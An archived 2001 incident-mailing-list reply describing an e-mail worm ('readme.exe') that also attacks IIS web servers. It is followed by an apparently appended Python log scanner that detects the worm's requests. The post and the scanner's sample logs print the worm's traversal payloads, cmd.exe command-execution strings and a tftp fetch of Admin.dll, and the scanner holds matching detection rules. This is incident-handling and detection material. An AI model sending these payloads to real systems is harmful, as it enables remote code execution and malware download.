Security Incidents mailing list archives
Re: New worm ??
From: "Jay D. Dyson" <jdyson () treachery net>
Date: Tue, 18 Sep 2001 09:14:47 -0700 (PDT)
On Tue, 18 Sep 2001, Cory McIntire wrote:

> I and a few others I know are getting bombarded on our machines with IIS requests....looks like another worm, and it's much smarter than before. It seems to stay within the same class A and sometimes the same class B as the attacking machine is in. Here is an excerpt of what I believe is the full scan....

Here's what I've been able to determine thus far: There is an e-mail worm propagating right now that comes with the payload 'readme.exe'. I suspect this e-mail worm preys on Outlook MUAs, but I have no confirmation of this since the e-mails I've received have been bounces. (Whoever released one iteration of this worm has the "From" address as 'staff () attrition org'.)

This payload does a load of things to assure its propagation. However, it differs from other email-based worms in that it also launches a number of web-based attacks. Namely:

    /scripts
    /MSADC
    /scripts/..%255c..
    /_vti_bin/..%255c../..%255c../..%255c..
    /_mem_bin/..%255c../..%255c../..%255c..
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
    /scripts/..%c1%1c..
    /scripts/..%c0%2f..
    /scripts/..%c0%af..
    /scripts/..%c1%9c..
    /scripts/..%%35%63..
    /scripts/..%%35c..
    /scripts/..%25%35%63..
    /scripts/..%252f..
    /root.exe?/c+
    /winnt/system32/cmd.exe?/c+
    net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
    tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

As can be seen above, it also attempts to make a tftp retrieval for Admin.dll. *sigh* Yet another worm made possible by the insecurity of Microsoft.

-Jay

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
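A defender-side check for the request patterns listed in the message, added here as an example and not code from the original post or from any project: it normalizes each access-log path the way IIS would (two rounds of percent-decoding, overlong UTF-8 slashes folded) before matching, so the `%255c`, `%c1%1c` and `%252f` variants all reduce to a plain traversal. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 byte pairs that IIS decoded as '/' or '\' (the %c0%af, %c1%1c style entries above).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

def normalize(path: str) -> str:
    """Percent-decode twice (%255c -> %5c -> \\), fold overlong slashes, lower-case."""
    raw = path.encode("latin-1", "replace")
    for _ in range(2):
        raw = unquote_to_bytes(raw)
    for seq, rep in OVERLONG.items():
        raw = raw.replace(seq, rep)
    return raw.decode("latin-1").replace("\\", "/").lower()

REQUEST = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')
RULES = [  # evaluated against the normalized path, so the encoding variant does not matter
    ("traversal", re.compile(r"/\.\./")),
    ("cmd-exec", re.compile(r"/(cmd|root)\.exe\?/c\+")),
    ("tftp-fetch", re.compile(r"\btftp\b.*\bget\b")),
    ("net-use", re.compile(r"\bnet\s+use\b")),
]

def classify(line: str) -> list:
    """Names of the rules a single access-log line trips (empty list if clean)."""
    m = REQUEST.search(line)
    return [name for name, rx in RULES if rx.search(normalize(m.group("path")))] if m else []

# Constructed sample log lines (not real traffic) in common log format.
LOGS = """\
10.0.0.7 - - [18/Sep/2001:09:02:11 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:09:02:12 -0700] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2010.0.0.7%20GET%20Admin.dll HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:09:02:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:09:02:14 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
192.168.1.5 - - [18/Sep/2001:09:03:00 -0700] "GET /index.html HTTP/1.0" 200 1024
"""

def scan(log_text: str) -> list:
    """(client address, tags) for every line that trips at least one rule."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            hits.append((line.split(" ", 1)[0], tags))
    return hits

if __name__ == "__main__":
    for client, tags in scan(LOGS):
        print(client, ",".join(tags))
```

Matching on the decoded path rather than the raw one is the point: a rule written against the literal string `..%255c..` misses the `%c1%1c` and `%252f` forms of the same request.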
Current thread:
- New worm ?? Cory McIntire (Sep 18)
- Re: New worm ?? Jay D. Dyson (Sep 18)
- RE: New worm ?? Olivier DEMBOUR (Sep 18)
- Re: New worm ?? Pedro Miller Rabinovitch (Sep 18)